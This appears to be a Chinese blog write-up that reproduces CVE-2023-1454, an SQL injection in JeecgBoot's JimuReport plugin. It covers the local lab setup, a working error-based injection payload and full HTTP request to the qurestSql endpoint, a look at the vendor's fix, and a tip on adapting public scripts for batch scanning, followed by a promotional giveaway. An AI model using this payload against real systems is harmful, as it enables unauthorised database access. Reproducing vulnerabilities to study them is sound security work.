CVE-2023-1454注入分析复现

简介

JeecgBoot的代码生成器是一种可以帮助开发者快速构建企业级应用的工具,它可以通过一键生成前后端代码,无需写任何代码,让开发者更多关注业务逻辑。

影响版本

Jeecg-Boot<=3.5.1

环境搭建

idea+

后端源码:

https://github.com/jeecgboot/jeecg-boot/archive/refs/tags/v3.5.0.zip

前端源码:

https://github.com/jeecgboot/jeecgboot-vue3/archive/refs/tags/v3.5.0.zip

安装npm,安装nodejs

https://nodejs.org/dist/v18.16.1/node-v18.16.1-x64.msi

CVE-2023-1454注入分析复现_第1张图片

CVE-2023-1454注入分析复现_第2张图片

安装yarn

npm install -g yarn

CVE-2023-1454注入分析复现_第3张图片

下载依赖

yarn install
yarn run serve  //起服务

CVE-2023-1454注入分析复现_第4张图片

由于是前后端分离,需要数据库导入表,使用navicat直接导入即可

CVE-2023-1454注入分析复现_第5张图片

后端服务端搭建,使用idea搭建导入项目,修改数据库配置

CVE-2023-1454注入分析复现_第6张图片

配置server端npm服务

CVE-2023-1454注入分析复现_第7张图片

配置好之后直接启动,访问

http://localhost:3100/login

CVE-2023-1454注入分析复现_第8张图片

搭建成功

帮助网安学习,全套资料S信免费领取:
① 网安学习成长路径思维导图
② 60+网安经典常用工具包
③ 100+SRC分析报告
④ 150+网安攻防实战技术电子书
⑤ 最权威CISSP 认证考试指南+题库
⑥ 超1800页CTF实战技巧手册
⑦ 最新网安大厂面试题合集(含答案)
⑧ APP客户端安全检测指南(安卓+IOS)

漏洞复现

前后端分离,后端端口8080 ,Payload:

{"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"}
POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Content-Type: application/json
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Length: 128

{"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"}

CVE-2023-1454注入分析复现_第9张图片

分析

漏洞产生点位于积木报表插件内,查看更新的3.5.1的版本更新

CVE-2023-1454注入分析复现_第10张图片

更改了72处的文件,其中需要注意db/其他数据库/jeecgboot-sqlserver2019.sql中重写了数据插入的方法

jeecg-boot-base-core/src/main/java/org/jeecg/common/util/SqlInjectionUtil.java中增加了对sql语句的正则

CVE-2023-1454注入分析复现_第11张图片

这个修复是针对于后端的SQL注入,/sys/duplicate/check

CVE-2023-1454注入分析复现_第12张图片

目前最新更新的3.5.1版本似乎依旧没有针对积木报表注入点儿的加固措施,修复时更换jar包

CVE-2023-1454注入分析复现_第13张图片

目前积木官方的jar包已升级。

关注积木5月份的升级日志

http://jimureport.com/doc/log

CVE-2023-1454注入分析复现_第14张图片

小结

github上有师傅们的脚本,但是如果要批量使用的话建议在修改一下response的内容,仅仅只有操作失败的报错的话会存在大批量的报错。

CVE-2023-1454注入分析复现_第15张图片

所有自定义的if判断的回显都建议修改一下,如有错误欢迎指出。

你可能感兴趣的:(漏洞挖掘,经验分享,渗透测试,漏洞复现,漏洞分析,nodejs)